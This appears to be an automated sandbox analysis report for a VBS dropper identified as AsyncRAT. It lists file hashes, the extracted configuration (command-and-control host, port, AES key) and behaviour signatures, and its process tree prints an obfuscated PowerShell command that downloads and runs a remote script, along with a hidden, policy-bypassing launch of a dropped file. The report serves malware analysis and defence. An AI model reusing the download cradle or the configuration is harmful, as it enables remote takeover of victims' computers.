Overview

overview

10

Static

static

LUID618.vbs

windows7_x64

8

LUID618.vbs

windows10_x64

10

Analysis

  • max time kernel
    66s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-07-2021 06:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LUID618.vbs

  • Size

    662B

  • MD5

    a39f9093ecdceb92cf629cd5764dd1d2

  • SHA1

    1942c681159cbbce82dc7388b0de29b984f43bd8

  • SHA256

    83d832887ed1b0af95ca14e647463251f0c9660971fddb03d3959647d6faee4d

  • SHA512

    c18fd694af943cdc74a0679fe43214afb9c652a5e53dca386e631d765449e64bff524809ef2a7923843272dc9040a080028e4f1709eb37b95723b14443521c1a

Score
10/10
asyncratratsuricata

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

newfrost.ddns.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    i7qGeRW2Orm1I0pgfxYOISTcRoWU7fSK

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    newfrost.ddns.net

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6666

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
    suricata
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LUID618.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3x1bIxK'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps1
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:688
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
          4⤵
            PID:2284
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
            4⤵
              PID:2248
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:196

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Public\ToT.ps1
        MD5

        8f8c2450bc9cffbd58c9f5b636352117

        SHA1

        ca15532c513d81cd0ce02d15215a92cb0de02161

        SHA256

        a0e4c425360270c90af50799d89a5f5c011d7108c92deeba06c8c1cf180ae4d1

        SHA512

        f342b2ac3c55b3a72375526c900cf2273556d81dceab97c32e0ddc1c194fffcd3418a1348431b1e1b044784354eb9b9a8d5f6987fd4397650d693c36367ed98a

        Download Submit
      • memory/196-379-0x0000000006890000-0x0000000006891000-memory.dmp
        Filesize

        4KB

        Download
      • memory/196-384-0x0000000006F40000-0x0000000006F41000-memory.dmp
        Filesize

        4KB

        Download
      • memory/196-382-0x0000000006D50000-0x0000000006DDD000-memory.dmp
        Filesize

        564KB

        Download
      • memory/196-381-0x0000000006900000-0x0000000006904000-memory.dmp
        Filesize

        16KB

        Download
      • memory/196-380-0x0000000006990000-0x0000000006991000-memory.dmp
        Filesize

        4KB

        Download
      • memory/196-373-0x0000000005000000-0x0000000005001000-memory.dmp
        Filesize

        4KB

        Download
      • memory/196-378-0x0000000006710000-0x0000000006789000-memory.dmp
        Filesize

        484KB

        Download
      • memory/196-383-0x0000000006EE0000-0x0000000006F39000-memory.dmp
        Filesize

        356KB

        Download
      • memory/196-377-0x0000000006790000-0x0000000006791000-memory.dmp
        Filesize

        4KB

        Download
      • memory/196-376-0x0000000005950000-0x0000000005951000-memory.dmp
        Filesize

        4KB

        Download
      • memory/196-375-0x0000000005E50000-0x0000000005E51000-memory.dmp
        Filesize

        4KB

        Download
      • memory/196-374-0x00000000058B0000-0x00000000058B1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/196-361-0x0000000000400000-0x0000000000412000-memory.dmp
        Filesize

        72KB

        Download
      • memory/196-362-0x000000000040C73E-mapping.dmp
        Download
      • memory/688-311-0x0000000000000000-mapping.dmp
        Download
      • memory/688-356-0x000001DDAEF96000-0x000001DDAEF98000-memory.dmp
        Filesize

        8KB

        Download
      • memory/688-355-0x000001DDC9150000-0x000001DDC915E000-memory.dmp
        Filesize

        56KB

        Download
      • memory/688-350-0x000001DDAEF93000-0x000001DDAEF95000-memory.dmp
        Filesize

        8KB

        Download
      • memory/688-349-0x000001DDAEF90000-0x000001DDAEF92000-memory.dmp
        Filesize

        8KB

        Download
      • memory/688-336-0x000001DDC9110000-0x000001DDC9111000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1172-114-0x0000000000000000-mapping.dmp
        Download
      • memory/1172-310-0x000002A679816000-0x000002A679818000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1172-127-0x000002A67BA00000-0x000002A67BA01000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1172-122-0x000002A679813000-0x000002A679815000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1172-121-0x000002A679810000-0x000002A679812000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1172-120-0x000002A679740000-0x000002A679741000-memory.dmp
        Filesize

        4KB

        Download